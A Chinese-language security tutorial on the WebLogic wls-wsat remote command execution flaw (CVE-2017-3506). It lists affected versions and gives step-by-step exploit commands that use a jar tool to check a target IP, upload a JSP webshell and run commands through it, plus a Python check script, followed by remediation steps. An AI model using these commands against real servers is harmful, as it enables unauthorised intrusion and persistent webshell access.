所有文章,仅供安全研究与学习之用,后果自负!
weblogic wls-wsat组件远程命令执行(CVE-2017-3506)
前言
与weblogic 反序列化(CVE-2017-10271)类似
一般情况下weblogic会开放7001以及7002端口
0x01 漏洞描述
wls-wsat组件远程命令执行
如果访问/wls-wsat/CoordinatorPortType11目录,存在下图则说明或许存在漏洞
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
0x02 影响范围
OracleWebLogic Server10.3.6.0.0
OracleWebLogic Server12.1.3.0.0
OracleWebLogic Server12.2.1.1.0
OracleWebLogic Server12.2.1.2.0
0x03 漏洞利用
工具:
cve-2017-3506_webshell.jar
(1)查看使用方法
java -jar cve-2017-3506_webshell.jar
(2)单个url检查
显示漏洞存在
java -jar cve-2017-3506_webshell.jar -u http://118.193.36.37:57661
(3)上传木马
payload
端口后边有个空格
java -jar cve-2017-3506_webshell.jar -s http://118.193.36.37:57661 /wls-wsat/CoordinatorPortType11 shell1.jsp
(4)执行命令
payload:
http://118.193.36.37:57661/wls-wsat/shell1.jsp?password=secfree&command=whoami
cve-2017-3506_poc.py 检测是否存在
python2运行
(1) 运行查看使用方法
(2)检测是否存在漏洞
python2 cve-2017-3506_poc.py http://118.193.36.37:35509/
- 显示存在漏洞
0x04 漏洞修复
1.删除war包
根据实际 环境 路径和业务需求,删除WebLogic程序下列war包及目录
rm -f/home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
2.设置网络访问控制
配置 http://ip_address:7001/wls-wsat 网络访问控制策略,禁止外网可以直接访问。
3.更新补丁和扫描:
更新Oracle官方发布相关补丁,下载链接: http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html 。
3.检测和防御
阿里云态势感知已增加检测规则,支持入侵行为和漏洞检测,建议您开通态势感知(专业版以上版本)进行检测。